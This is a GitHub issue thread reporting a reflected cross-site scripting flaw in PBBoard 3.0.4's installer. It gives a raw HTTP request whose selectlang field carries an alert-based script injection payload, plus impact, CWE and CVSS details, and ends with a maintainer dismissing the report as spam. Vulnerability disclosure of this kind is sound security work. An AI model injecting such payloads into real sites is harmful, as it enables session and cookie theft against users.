### ISSUE TITLE
Reflected XSS vulnerability

### ISSUE THREAD

**Issue by abdallhsamy** [pbboard/PBBoard-3.0.4#9]
```
POST /PBBoard-3.0.4/install/index.php HTTP/1.1
Host: 165.232.120.39
Content-Length: 25
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://165.232.120.39
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://165.232.120.39/PBBoard-3.0.4/install/index.php
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

selectlang=ar&action=lang
```
Changed to

```
POST /PBBoard-3.0.4/install/index.php HTTP/1.1
Host: 165.232.120.39
Content-Length: 55
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://165.232.120.39
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://165.232.120.39/PBBoard-3.0.4/install/index.php
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

selectlang=<img src=x onerror=alert("XSS")>&action=lang
```
![](
https://i.imgur.com/b8nNnsI.png)

## Impact

Stealing cookies End-user files disclosure

## Occurrences

[index.php L132](https://github.com/pbboard/PBBoard-3.0.4/blob/0e03caa44592755f7ce7137493f276b3c7a59d56/install/index.php#L132)

## Vulnerability Type 
[CWE-79: Cross-site Scripting (XSS) - Reflected](https://cwe.mitre.org/data/definitions/79.html) 

## Severity 
Medium (6.3) 

| Key       | Value   |
|---------------------|-----------|
| Attack vector       | Network   |
| Attack complexity   | Low       |
| Privileged required | None      |
| User interaction    | Required  |
| Scope               | Unchanged |
| Confidentiality     | Low       |
| Integrity           | Low       |
| Availability        | Low       |

[Open in visual CVSS calculator ](https://cvss.js.org/#CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L)

**Comment by sulaiman0dawod** [comment]
i marked this vulnerability as spam
The install file is only temporary and is not important.
